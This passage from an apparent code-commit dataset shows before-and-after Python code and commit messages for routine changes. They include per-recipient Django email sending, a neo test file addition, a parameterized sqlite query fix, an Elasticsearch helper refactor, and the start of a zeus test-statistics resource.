return msg
|
<commit_before>from django.conf import settings
from django.core.mail import EmailMultiAlternatives
from django.template.loader import get_template
from django.template import Context
from django.contrib.sites.models import Site
def send_group_email(request, to_email, subject, email_text_template, email_html_template):
"""Sends a email to a group of people using a standard layout"""
# Mail the admins to inform them of a new request
ctx = Context({'request': request, 'domain': Site.objects.get_current().domain})
msg = EmailMultiAlternatives(subject, get_template(email_text_template).render(ctx), getattr(settings, 'DEFAULT_FROM_EMAIL', 'auth@pleaseignore.com'), to_email)
msg.attach_alternative(get_template(email_html_template).render(ctx), 'text/html')
msg.send(fail_silently=True)
<commit_msg>Send individual mails, to avoid showing the whole to list, BCC and spamholing from Google<commit_after>
|
from django.conf import settings
from django.core.mail import EmailMultiAlternatives, get_connection
from django.template.loader import get_template
from django.template import Context
from django.contrib.sites.models import Site
def send_group_email(request, to_email, subject, email_text_template, email_html_template):
"""Sends a email to a group of people using a standard layout"""
# Mail the admins to inform them of a new request
ctx = Context({'request': request, 'domain': Site.objects.get_current().domain})
messages = [generate_mail(ctx, email_text_template, email_html_template, to, subject) for to in to_email]
connection = get_connection(fail_silently=True)
connection.send_messages(messages)
def generate_mail(context, email_text_template, email_html_template, to, subject):
msg = EmailMultiAlternatives(subject, get_template(email_text_template).render(context), getattr(settings, 'DEFAULT_FROM_EMAIL', 'auth@pleaseignore.com'), [to])
msg.attach_alternative(get_template(email_html_template).render(context), 'text/html')
return msg
|
from django.conf import settings
from django.core.mail import EmailMultiAlternatives
from django.template.loader import get_template
from django.template import Context
from django.contrib.sites.models import Site
def send_group_email(request, to_email, subject, email_text_template, email_html_template):
"""Sends a email to a group of people using a standard layout"""
# Mail the admins to inform them of a new request
ctx = Context({'request': request, 'domain': Site.objects.get_current().domain})
msg = EmailMultiAlternatives(subject, get_template(email_text_template).render(ctx), getattr(settings, 'DEFAULT_FROM_EMAIL', 'auth@pleaseignore.com'), to_email)
msg.attach_alternative(get_template(email_html_template).render(ctx), 'text/html')
msg.send(fail_silently=True)
Send individual mails, to avoid showing the whole to list, BCC and spamholing from Googlefrom django.conf import settings
from django.core.mail import EmailMultiAlternatives, get_connection
from django.template.loader import get_template
from django.template import Context
from django.contrib.sites.models import Site
def send_group_email(request, to_email, subject, email_text_template, email_html_template):
"""Sends a email to a group of people using a standard layout"""
# Mail the admins to inform them of a new request
ctx = Context({'request': request, 'domain': Site.objects.get_current().domain})
messages = [generate_mail(ctx, email_text_template, email_html_template, to, subject) for to in to_email]
connection = get_connection(fail_silently=True)
connection.send_messages(messages)
def generate_mail(context, email_text_template, email_html_template, to, subject):
msg = EmailMultiAlternatives(subject, get_template(email_text_template).render(context), getattr(settings, 'DEFAULT_FROM_EMAIL', 'auth@pleaseignore.com'), [to])
msg.attach_alternative(get_template(email_html_template).render(context), 'text/html')
return msg
|
<commit_before>from django.conf import settings
from django.core.mail import EmailMultiAlternatives
from django.template.loader import get_template
from django.template import Context
from django.contrib.sites.models import Site
def send_group_email(request, to_email, subject, email_text_template, email_html_template):
"""Sends a email to a group of people using a standard layout"""
# Mail the admins to inform them of a new request
ctx = Context({'request': request, 'domain': Site.objects.get_current().domain})
msg = EmailMultiAlternatives(subject, get_template(email_text_template).render(ctx), getattr(settings, 'DEFAULT_FROM_EMAIL', 'auth@pleaseignore.com'), to_email)
msg.attach_alternative(get_template(email_html_template).render(ctx), 'text/html')
msg.send(fail_silently=True)
<commit_msg>Send individual mails, to avoid showing the whole to list, BCC and spamholing from Google<commit_after>from django.conf import settings
from django.core.mail import EmailMultiAlternatives, get_connection
from django.template.loader import get_template
from django.template import Context
from django.contrib.sites.models import Site
def send_group_email(request, to_email, subject, email_text_template, email_html_template):
"""Sends a email to a group of people using a standard layout"""
# Mail the admins to inform them of a new request
ctx = Context({'request': request, 'domain': Site.objects.get_current().domain})
messages = [generate_mail(ctx, email_text_template, email_html_template, to, subject) for to in to_email]
connection = get_connection(fail_silently=True)
connection.send_messages(messages)
def generate_mail(context, email_text_template, email_html_template, to, subject):
msg = EmailMultiAlternatives(subject, get_template(email_text_template).render(context), getattr(settings, 'DEFAULT_FROM_EMAIL', 'auth@pleaseignore.com'), [to])
msg.attach_alternative(get_template(email_html_template).render(context), 'text/html')
return msg
|
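The technique in this record generalizes: build one message per recipient and push the whole batch through a single backend connection, so each recipient sees only their own address and no shared To: list or BCC is needed. A minimal sketch with Django's plain EmailMessage (subject, body and recipient values are placeholders, not from this record):

# Minimal sketch of the per-recipient send pattern used above.
from django.core.mail import EmailMessage, get_connection

def send_individually(subject, body, from_email, recipients):
    # One SMTP session for the whole batch instead of one per message.
    connection = get_connection(fail_silently=True)
    # Each message carries a single visible recipient.
    messages = [EmailMessage(subject, body, from_email, [to]) for to in recipients]
    connection.send_messages(messages)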
cfcce6d4002657f72afdd780af06b3bfa4d9e10d
|
neo/test/iotest/test_axonaio.py
|
neo/test/iotest/test_axonaio.py
|
"""
Tests of neo.io.axonaio
"""
import unittest
from neo.io.axonaio import AxonaIO
from neo.test.iotest.common_io_test import BaseTestIO
from neo.io.proxyobjects import (AnalogSignalProxy,
SpikeTrainProxy, EventProxy, EpochProxy)
from neo import (AnalogSignal, SpikeTrain)
import quantities as pq
import numpy as np
class TestAxonaIO(BaseTestIO, unittest.TestCase, ):
ioclass = AxonaIO
entities_to_download = [
'axona'
]
entities_to_test = [
'axona/axona_raw.set'
]
if __name__ == "__main__":
unittest.main()
|
"""
Tests of neo.io.axonaio
"""
import unittest
from neo.io.axonaio import AxonaIO
from neo.test.iotest.common_io_test import BaseTestIO
from neo.io.proxyobjects import (AnalogSignalProxy,
SpikeTrainProxy, EventProxy, EpochProxy)
from neo import (AnalogSignal, SpikeTrain)
import quantities as pq
import numpy as np
class TestAxonaIO(BaseTestIO, unittest.TestCase, ):
ioclass = AxonaIO
entities_to_download = [
'axona'
]
entities_to_test = [
'axona/axona_raw.set',
'axona/dataset_unit_spikes/20140815-180secs.set'
]
if __name__ == "__main__":
unittest.main()
|
Add new files to common io tests
|
Add new files to common io tests
|
Python
|
bsd-3-clause
|
apdavison/python-neo,NeuralEnsemble/python-neo,JuliaSprenger/python-neo,samuelgarcia/python-neo,INM-6/python-neo
|
"""
Tests of neo.io.axonaio
"""
import unittest
from neo.io.axonaio import AxonaIO
from neo.test.iotest.common_io_test import BaseTestIO
from neo.io.proxyobjects import (AnalogSignalProxy,
SpikeTrainProxy, EventProxy, EpochProxy)
from neo import (AnalogSignal, SpikeTrain)
import quantities as pq
import numpy as np
class TestAxonaIO(BaseTestIO, unittest.TestCase, ):
ioclass = AxonaIO
entities_to_download = [
'axona'
]
entities_to_test = [
'axona/axona_raw.set'
]
if __name__ == "__main__":
unittest.main()
Add new files to common io tests
|
"""
Tests of neo.io.axonaio
"""
import unittest
from neo.io.axonaio import AxonaIO
from neo.test.iotest.common_io_test import BaseTestIO
from neo.io.proxyobjects import (AnalogSignalProxy,
SpikeTrainProxy, EventProxy, EpochProxy)
from neo import (AnalogSignal, SpikeTrain)
import quantities as pq
import numpy as np
class TestAxonaIO(BaseTestIO, unittest.TestCase, ):
ioclass = AxonaIO
entities_to_download = [
'axona'
]
entities_to_test = [
'axona/axona_raw.set',
'axona/dataset_unit_spikes/20140815-180secs.set'
]
if __name__ == "__main__":
unittest.main()
|
<commit_before>"""
Tests of neo.io.axonaio
"""
import unittest
from neo.io.axonaio import AxonaIO
from neo.test.iotest.common_io_test import BaseTestIO
from neo.io.proxyobjects import (AnalogSignalProxy,
SpikeTrainProxy, EventProxy, EpochProxy)
from neo import (AnalogSignal, SpikeTrain)
import quantities as pq
import numpy as np
class TestAxonaIO(BaseTestIO, unittest.TestCase, ):
ioclass = AxonaIO
entities_to_download = [
'axona'
]
entities_to_test = [
'axona/axona_raw.set'
]
if __name__ == "__main__":
unittest.main()
<commit_msg>Add new files to common io tests<commit_after>
|
"""
Tests of neo.io.axonaio
"""
import unittest
from neo.io.axonaio import AxonaIO
from neo.test.iotest.common_io_test import BaseTestIO
from neo.io.proxyobjects import (AnalogSignalProxy,
SpikeTrainProxy, EventProxy, EpochProxy)
from neo import (AnalogSignal, SpikeTrain)
import quantities as pq
import numpy as np
class TestAxonaIO(BaseTestIO, unittest.TestCase, ):
ioclass = AxonaIO
entities_to_download = [
'axona'
]
entities_to_test = [
'axona/axona_raw.set',
'axona/dataset_unit_spikes/20140815-180secs.set'
]
if __name__ == "__main__":
unittest.main()
|
"""
Tests of neo.io.axonaio
"""
import unittest
from neo.io.axonaio import AxonaIO
from neo.test.iotest.common_io_test import BaseTestIO
from neo.io.proxyobjects import (AnalogSignalProxy,
SpikeTrainProxy, EventProxy, EpochProxy)
from neo import (AnalogSignal, SpikeTrain)
import quantities as pq
import numpy as np
class TestAxonaIO(BaseTestIO, unittest.TestCase, ):
ioclass = AxonaIO
entities_to_download = [
'axona'
]
entities_to_test = [
'axona/axona_raw.set'
]
if __name__ == "__main__":
unittest.main()
Add new files to common io tests
"""
Tests of neo.io.axonaio
"""
import unittest
from neo.io.axonaio import AxonaIO
from neo.test.iotest.common_io_test import BaseTestIO
from neo.io.proxyobjects import (AnalogSignalProxy,
SpikeTrainProxy, EventProxy, EpochProxy)
from neo import (AnalogSignal, SpikeTrain)
import quantities as pq
import numpy as np
class TestAxonaIO(BaseTestIO, unittest.TestCase, ):
ioclass = AxonaIO
entities_to_download = [
'axona'
]
entities_to_test = [
'axona/axona_raw.set',
'axona/dataset_unit_spikes/20140815-180secs.set'
]
if __name__ == "__main__":
unittest.main()
|
<commit_before>"""
Tests of neo.io.axonaio
"""
import unittest
from neo.io.axonaio import AxonaIO
from neo.test.iotest.common_io_test import BaseTestIO
from neo.io.proxyobjects import (AnalogSignalProxy,
SpikeTrainProxy, EventProxy, EpochProxy)
from neo import (AnalogSignal, SpikeTrain)
import quantities as pq
import numpy as np
class TestAxonaIO(BaseTestIO, unittest.TestCase, ):
ioclass = AxonaIO
entities_to_download = [
'axona'
]
entities_to_test = [
'axona/axona_raw.set'
]
if __name__ == "__main__":
unittest.main()
<commit_msg>Add new files to common io tests<commit_after>"""
Tests of neo.io.axonaio
"""
import unittest
from neo.io.axonaio import AxonaIO
from neo.test.iotest.common_io_test import BaseTestIO
from neo.io.proxyobjects import (AnalogSignalProxy,
SpikeTrainProxy, EventProxy, EpochProxy)
from neo import (AnalogSignal, SpikeTrain)
import quantities as pq
import numpy as np
class TestAxonaIO(BaseTestIO, unittest.TestCase, ):
ioclass = AxonaIO
entities_to_download = [
'axona'
]
entities_to_test = [
'axona/axona_raw.set',
'axona/dataset_unit_spikes/20140815-180secs.set'
]
if __name__ == "__main__":
unittest.main()
|
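The change itself is only a registered file path; it works because the shared IO test base iterates over these class attributes and runs its whole battery against each entry. A generic, hypothetical sketch of that data-driven style (CommonIOTest and the extension check are invented here, not neo's actual machinery):

import unittest

class CommonIOTest(unittest.TestCase):
    entities_to_test = [
        'axona/axona_raw.set',
        'axona/dataset_unit_spikes/20140815-180secs.set',  # newly registered
    ]

    def test_entities(self):
        for entity in self.entities_to_test:
            with self.subTest(entity=entity):
                # A real suite would open and parse each file; this
                # placeholder only checks the registered extension.
                self.assertTrue(entity.endswith('.set'))

if __name__ == '__main__':
    unittest.main()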
474f213cf2cc4851f9cfcd17652a29ad74ab1f0d
|
write_csv.py
|
write_csv.py
|
import sqlite3
import csv
from datetime import datetime
current_date = datetime.now().strftime('%Y-%m-%d')
destination_file = 'srvy' + current_date + '.csv'
sqlite_file = 'srvy.db'
table_name = 'responses'
date_column = 'date'
time_column = 'time'
score_column = 'score'
question_column = 'question'
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
#c.execute("SELECT * FROM responses WHERE date LIKE '%"+ current_date +"%'")
c.execute("SELECT * FROM responses WHERE date LIKE ?", current_date)
csvWriter = csv.writer(open(destination_file, 'w'))
rows = c.fetchall()
for row in rows:
csvWriter.writerow(row)
|
import sqlite3
import csv
from datetime import datetime
current_date = str(datetime.now().strftime('%Y-%m-%d'))
destination_file = 'srvy' + current_date + '.csv'
sqlite_file = 'srvy.db'
table_name = 'responses'
date_column = 'date'
time_column = 'time'
score_column = 'score'
question_column = 'question'
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
#c.execute("SELECT * FROM responses WHERE date LIKE '%"+ current_date +"%'")
c.execute("SELECT * FROM responses WHERE date = ?", (current_date,))
csvWriter = csv.writer(open(destination_file, 'w'))
rows = c.fetchall()
for row in rows:
csvWriter.writerow(row)
|
Change current date in SQLite query to tuple
|
Change current date in SQLite query to tuple
|
Python
|
mit
|
andrewlrogers/srvy
|
import sqlite3
import csv
from datetime import datetime
current_date = datetime.now().strftime('%Y-%m-%d')
destination_file = 'srvy' + current_date + '.csv'
sqlite_file = 'srvy.db'
table_name = 'responses'
date_column = 'date'
time_column = 'time'
score_column = 'score'
question_column = 'question'
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
#c.execute("SELECT * FROM responses WHERE date LIKE '%"+ current_date +"%'")
c.execute("SELECT * FROM responses WHERE date LIKE ?", current_date)
csvWriter = csv.writer(open(destination_file, 'w'))
rows = c.fetchall()
for row in rows:
csvWriter.writerow(row)
Change current date in SQLite query to tuple
|
import sqlite3
import csv
from datetime import datetime
current_date = str(datetime.now().strftime('%Y-%m-%d'))
destination_file = 'srvy' + current_date + '.csv'
sqlite_file = 'srvy.db'
table_name = 'responses'
date_column = 'date'
time_column = 'time'
score_column = 'score'
question_column = 'question'
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
#c.execute("SELECT * FROM responses WHERE date LIKE '%"+ current_date +"%'")
c.execute("SELECT * FROM responses WHERE date = ?", (current_date,))
csvWriter = csv.writer(open(destination_file, 'w'))
rows = c.fetchall()
for row in rows:
csvWriter.writerow(row)
|
<commit_before>import sqlite3
import csv
from datetime import datetime
current_date = datetime.now().strftime('%Y-%m-%d')
destination_file = 'srvy' + current_date + '.csv'
sqlite_file = 'srvy.db'
table_name = 'responses'
date_column = 'date'
time_column = 'time'
score_column = 'score'
question_column = 'question'
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
#c.execute("SELECT * FROM responses WHERE date LIKE '%"+ current_date +"%'")
c.execute("SELECT * FROM responses WHERE date LIKE ?", current_date)
csvWriter = csv.writer(open(destination_file, 'w'))
rows = c.fetchall()
for row in rows:
csvWriter.writerow(row)
<commit_msg>Change current date in SQLite query to tuple<commit_after>
|
import sqlite3
import csv
from datetime import datetime
current_date = str(datetime.now().strftime('%Y-%m-%d'))
destination_file = 'srvy' + current_date + '.csv'
sqlite_file = 'srvy.db'
table_name = 'responses'
date_column = 'date'
time_column = 'time'
score_column = 'score'
question_column = 'question'
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
#c.execute("SELECT * FROM responses WHERE date LIKE '%"+ current_date +"%'")
c.execute("SELECT * FROM responses WHERE date = ?", (current_date,))
csvWriter = csv.writer(open(destination_file, 'w'))
rows = c.fetchall()
for row in rows:
csvWriter.writerow(row)
|
import sqlite3
import csv
from datetime import datetime
current_date = datetime.now().strftime('%Y-%m-%d')
destination_file = 'srvy' + current_date + '.csv'
sqlite_file = 'srvy.db'
table_name = 'responses'
date_column = 'date'
time_column = 'time'
score_column = 'score'
question_column = 'question'
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
#c.execute("SELECT * FROM responses WHERE date LIKE '%"+ current_date +"%'")
c.execute("SELECT * FROM responses WHERE date LIKE ?", current_date)
csvWriter = csv.writer(open(destination_file, 'w'))
rows = c.fetchall()
for row in rows:
csvWriter.writerow(row)
Change current date in SQLite query to tuple
import sqlite3
import csv
from datetime import datetime
current_date = str(datetime.now().strftime('%Y-%m-%d'))
destination_file = 'srvy' + current_date + '.csv'
sqlite_file = 'srvy.db'
table_name = 'responses'
date_column = 'date'
time_column = 'time'
score_column = 'score'
question_column = 'question'
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
#c.execute("SELECT * FROM responses WHERE date LIKE '%"+ current_date +"%'")
c.execute("SELECT * FROM responses WHERE date = ?", (current_date,))
csvWriter = csv.writer(open(destination_file, 'w'))
rows = c.fetchall()
for row in rows:
csvWriter.writerow(row)
|
<commit_before>import sqlite3
import csv
from datetime import datetime
current_date = datetime.now().strftime('%Y-%m-%d')
destination_file = 'srvy' + current_date + '.csv'
sqlite_file = 'srvy.db'
table_name = 'responses'
date_column = 'date'
time_column = 'time'
score_column = 'score'
question_column = 'question'
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
#c.execute("SELECT * FROM responses WHERE date LIKE '%"+ current_date +"%'")
c.execute("SELECT * FROM responses WHERE date LIKE ?", current_date)
csvWriter = csv.writer(open(destination_file, 'w'))
rows = c.fetchall()
for row in rows:
csvWriter.writerow(row)
<commit_msg>Change current date in SQLite query to tuple<commit_after>import sqlite3
import csv
from datetime import datetime
current_date = str(datetime.now().strftime('%Y-%m-%d'))
destination_file = 'srvy' + current_date + '.csv'
sqlite_file = 'srvy.db'
table_name = 'responses'
date_column = 'date'
time_column = 'time'
score_column = 'score'
question_column = 'question'
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
#c.execute("SELECT * FROM responses WHERE date LIKE '%"+ current_date +"%'")
c.execute("SELECT * FROM responses WHERE date = ?", (current_date,))
csvWriter = csv.writer(open(destination_file, 'w'))
rows = c.fetchall()
for row in rows:
csvWriter.writerow(row)
|
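The fix matters because sqlite3's Cursor.execute treats its second argument as a sequence of bind parameters: a bare ten-character string is iterated character by character, supplying ten parameters to a statement with one placeholder. A self-contained reproduction (in-memory database and row are made up):

import sqlite3

conn = sqlite3.connect(':memory:')
c = conn.cursor()
c.execute("CREATE TABLE responses (date TEXT)")
c.execute("INSERT INTO responses VALUES ('2017-01-01')")

current_date = '2017-01-01'
# Passing the string directly raises sqlite3.ProgrammingError
# ("incorrect number of bindings supplied": 1 expected, 10 given).
# c.execute("SELECT * FROM responses WHERE date = ?", current_date)

# A one-element tuple binds the value correctly.
c.execute("SELECT * FROM responses WHERE date = ?", (current_date,))
print(c.fetchall())  # [('2017-01-01',)]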
1c9540879d8761d9252c3fb3f749ae0b6d5be2b9
|
wqflask/utility/elasticsearch_tools.py
|
wqflask/utility/elasticsearch_tools.py
|
es = None
try:
from elasticsearch import Elasticsearch, TransportError
from utility.tools import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}]) if (ELASTICSEARCH_HOST and ELASTICSEARCH_PORT) else None
except:
es = None
def get_user_by_unique_column(column_name, column_value):
user_details = None
try:
response = es.search(
index = "users"
, doc_type = "local"
, body = {
"query": { "match": { column_name: column_value } }
})
if len(response["hits"]["hits"]) > 0:
user_details = response["hits"]["hits"][0]["_source"]
except TransportError as te:
pass
return user_details
def save_user(user, user_id, index="users", doc_type="local"):
from time import sleep
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}])
es.create(index, doc_type, body=user, id=user_id)
sleep(1) # Delay 1 second to allow indexing
|
es = None
try:
from elasticsearch import Elasticsearch, TransportError
from utility.tools import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}]) if (ELASTICSEARCH_HOST and ELASTICSEARCH_PORT) else None
except:
es = None
def get_user_by_unique_column(column_name, column_value):
return get_item_by_unique_column(column_name, column_value, index="users", doc_type="local")
def save_user(user, user_id):
es_save_data("users", "local", user, user_id)
def get_item_by_unique_column(column_name, column_value, index, doc_type):
item_details = None
try:
response = es.search(
index = index
, doc_type = doc_type
, body = {
"query": { "match": { column_name: column_value } }
})
if len(response["hits"]["hits"]) > 0:
item_details = response["hits"]["hits"][0]["_source"]
except TransportError as te:
pass
return item_details
def es_save_data(index, doc_type, data_item, data_id,):
from time import sleep
es.create(index, doc_type, body=data_item, id=data_id)
sleep(1) # Delay 1 second to allow indexing
|
Refactor common items to more generic methods.
|
Refactor common items to more generic methods.
* Refactor code that can be used in more than one place to a more
generic method/function that's called by other methods
|
Python
|
agpl-3.0
|
pjotrp/genenetwork2,zsloan/genenetwork2,DannyArends/genenetwork2,genenetwork/genenetwork2,DannyArends/genenetwork2,zsloan/genenetwork2,pjotrp/genenetwork2,DannyArends/genenetwork2,pjotrp/genenetwork2,zsloan/genenetwork2,DannyArends/genenetwork2,DannyArends/genenetwork2,zsloan/genenetwork2,pjotrp/genenetwork2,DannyArends/genenetwork2,genenetwork/genenetwork2,genenetwork/genenetwork2,genenetwork/genenetwork2,pjotrp/genenetwork2
|
es = None
try:
from elasticsearch import Elasticsearch, TransportError
from utility.tools import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}]) if (ELASTICSEARCH_HOST and ELASTICSEARCH_PORT) else None
except:
es = None
def get_user_by_unique_column(column_name, column_value):
user_details = None
try:
response = es.search(
index = "users"
, doc_type = "local"
, body = {
"query": { "match": { column_name: column_value } }
})
if len(response["hits"]["hits"]) > 0:
user_details = response["hits"]["hits"][0]["_source"]
except TransportError as te:
pass
return user_details
def save_user(user, user_id, index="users", doc_type="local"):
from time import sleep
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}])
es.create(index, doc_type, body=user, id=user_id)
sleep(1) # Delay 1 second to allow indexing
Refactor common items to more generic methods.
* Refactor code that can be used in more than one place to a more
generic method/function that's called by other methods
|
es = None
try:
from elasticsearch import Elasticsearch, TransportError
from utility.tools import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}]) if (ELASTICSEARCH_HOST and ELASTICSEARCH_PORT) else None
except:
es = None
def get_user_by_unique_column(column_name, column_value):
return get_item_by_unique_column(column_name, column_value, index="users", doc_type="local")
def save_user(user, user_id):
es_save_data("users", "local", user, user_id)
def get_item_by_unique_column(column_name, column_value, index, doc_type):
item_details = None
try:
response = es.search(
index = index
, doc_type = doc_type
, body = {
"query": { "match": { column_name: column_value } }
})
if len(response["hits"]["hits"]) > 0:
item_details = response["hits"]["hits"][0]["_source"]
except TransportError as te:
pass
return item_details
def es_save_data(index, doc_type, data_item, data_id,):
from time import sleep
es.create(index, doc_type, body=data_item, id=data_id)
sleep(1) # Delay 1 second to allow indexing
|
<commit_before>es = None
try:
from elasticsearch import Elasticsearch, TransportError
from utility.tools import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}]) if (ELASTICSEARCH_HOST and ELASTICSEARCH_PORT) else None
except:
es = None
def get_user_by_unique_column(column_name, column_value):
user_details = None
try:
response = es.search(
index = "users"
, doc_type = "local"
, body = {
"query": { "match": { column_name: column_value } }
})
if len(response["hits"]["hits"]) > 0:
user_details = response["hits"]["hits"][0]["_source"]
except TransportError as te:
pass
return user_details
def save_user(user, user_id, index="users", doc_type="local"):
from time import sleep
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}])
es.create(index, doc_type, body=user, id=user_id)
sleep(1) # Delay 1 second to allow indexing
<commit_msg>Refactor common items to more generic methods.
* Refactor code that can be used in more than one place to a more
generic method/function that's called by other methods<commit_after>
|
es = None
try:
from elasticsearch import Elasticsearch, TransportError
from utility.tools import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}]) if (ELASTICSEARCH_HOST and ELASTICSEARCH_PORT) else None
except:
es = None
def get_user_by_unique_column(column_name, column_value):
return get_item_by_unique_column(column_name, column_value, index="users", doc_type="local")
def save_user(user, user_id):
es_save_data("users", "local", user, user_id)
def get_item_by_unique_column(column_name, column_value, index, doc_type):
item_details = None
try:
response = es.search(
index = index
, doc_type = doc_type
, body = {
"query": { "match": { column_name: column_value } }
})
if len(response["hits"]["hits"]) > 0:
item_details = response["hits"]["hits"][0]["_source"]
except TransportError as te:
pass
return item_details
def es_save_data(index, doc_type, data_item, data_id,):
from time import sleep
es.create(index, doc_type, body=data_item, id=data_id)
sleep(1) # Delay 1 second to allow indexing
|
es = None
try:
from elasticsearch import Elasticsearch, TransportError
from utility.tools import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}]) if (ELASTICSEARCH_HOST and ELASTICSEARCH_PORT) else None
except:
es = None
def get_user_by_unique_column(column_name, column_value):
user_details = None
try:
response = es.search(
index = "users"
, doc_type = "local"
, body = {
"query": { "match": { column_name: column_value } }
})
if len(response["hits"]["hits"]) > 0:
user_details = response["hits"]["hits"][0]["_source"]
except TransportError as te:
pass
return user_details
def save_user(user, user_id, index="users", doc_type="local"):
from time import sleep
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}])
es.create(index, doc_type, body=user, id=user_id)
sleep(1) # Delay 1 second to allow indexing
Refactor common items to more generic methods.
* Refactor code that can be used in more than one place to a more
generic method/function that's called by other methods
es = None
try:
from elasticsearch import Elasticsearch, TransportError
from utility.tools import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}]) if (ELASTICSEARCH_HOST and ELASTICSEARCH_PORT) else None
except:
es = None
def get_user_by_unique_column(column_name, column_value):
return get_item_by_unique_column(column_name, column_value, index="users", doc_type="local")
def save_user(user, user_id):
es_save_data("users", "local", user, user_id)
def get_item_by_unique_column(column_name, column_value, index, doc_type):
item_details = None
try:
response = es.search(
index = index
, doc_type = doc_type
, body = {
"query": { "match": { column_name: column_value } }
})
if len(response["hits"]["hits"]) > 0:
item_details = response["hits"]["hits"][0]["_source"]
except TransportError as te:
pass
return item_details
def es_save_data(index, doc_type, data_item, data_id,):
from time import sleep
es.create(index, doc_type, body=data_item, id=data_id)
sleep(1) # Delay 1 second to allow indexing
|
<commit_before>es = None
try:
from elasticsearch import Elasticsearch, TransportError
from utility.tools import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}]) if (ELASTICSEARCH_HOST and ELASTICSEARCH_PORT) else None
except:
es = None
def get_user_by_unique_column(column_name, column_value):
user_details = None
try:
response = es.search(
index = "users"
, doc_type = "local"
, body = {
"query": { "match": { column_name: column_value } }
})
if len(response["hits"]["hits"]) > 0:
user_details = response["hits"]["hits"][0]["_source"]
except TransportError as te:
pass
return user_details
def save_user(user, user_id, index="users", doc_type="local"):
from time import sleep
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}])
es.create(index, doc_type, body=user, id=user_id)
sleep(1) # Delay 1 second to allow indexing
<commit_msg>Refactor common items to more generic methods.
* Refactor code that can be used in more than one place to a more
generic method/function that's called by other methods<commit_after>es = None
try:
from elasticsearch import Elasticsearch, TransportError
from utility.tools import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}]) if (ELASTICSEARCH_HOST and ELASTICSEARCH_PORT) else None
except:
es = None
def get_user_by_unique_column(column_name, column_value):
return get_item_by_unique_column(column_name, column_value, index="users", doc_type="local")
def save_user(user, user_id):
es_save_data("users", "local", user, user_id)
def get_item_by_unique_column(column_name, column_value, index, doc_type):
item_details = None
try:
response = es.search(
index = index
, doc_type = doc_type
, body = {
"query": { "match": { column_name: column_value } }
})
if len(response["hits"]["hits"]) > 0:
item_details = response["hits"]["hits"][0]["_source"]
except TransportError as te:
pass
return item_details
def es_save_data(index, doc_type, data_item, data_id,):
from time import sleep
es.create(index, doc_type, body=data_item, id=data_id)
sleep(1) # Delay 1 second to allow indexing
|
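A note on the shape of this refactor: once the generic get_item_by_unique_column and es_save_data exist, the thin user-specific wrappers could equally be derived mechanically. A hypothetical variation using functools.partial against the functions defined in this record:

from functools import partial

get_user_by_unique_column = partial(get_item_by_unique_column,
                                    index="users", doc_type="local")
save_user = partial(es_save_data, "users", "local")

Explicit def wrappers, as the commit writes them, do keep docstrings and tracebacks more readable, which is a reasonable ground for preferring them.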
2438efb99b85fbc76cd285792c1511e7e2813a05
|
zeus/api/resources/repository_tests.py
|
zeus/api/resources/repository_tests.py
|
from datetime import timedelta
from sqlalchemy.sql import func
from zeus.config import db
from zeus.constants import Result, Status
from zeus.models import Repository, TestCase, Job
from zeus.utils import timezone
from .base_repository import BaseRepositoryResource
from ..schemas import TestCaseStatisticsSchema
testcases_schema = TestCaseStatisticsSchema(many=True)
class RepositoryTestsResource(BaseRepositoryResource):
def get(self, repo: Repository):
"""
Return a list of testcases for the given repository.
"""
runs_failed = (
func.count(TestCase.result)
.filter(TestCase.result == Result.failed)
.label("runs_failed")
)
query = (
db.session.query(
TestCase.hash,
TestCase.name,
func.count(TestCase.hash).label("runs_total"),
runs_failed,
func.avg(TestCase.duration).label("avg_duration"),
)
.join(Job, TestCase.job_id == Job.id)
.filter(
Job.repository_id == repo.id,
Job.date_finished >= timezone.now() - timedelta(days=14),
Job.status == Status.finished,
TestCase.repository_id == repo.id,
)
.group_by(TestCase.hash, TestCase.name)
.order_by(runs_failed.desc())
)
return self.paginate_with_schema(testcases_schema, query)
|
from datetime import timedelta
from sqlalchemy.sql import func
from zeus.config import db
from zeus.constants import Result, Status
from zeus.models import Repository, TestCase, Job
from zeus.utils import timezone
from .base_repository import BaseRepositoryResource
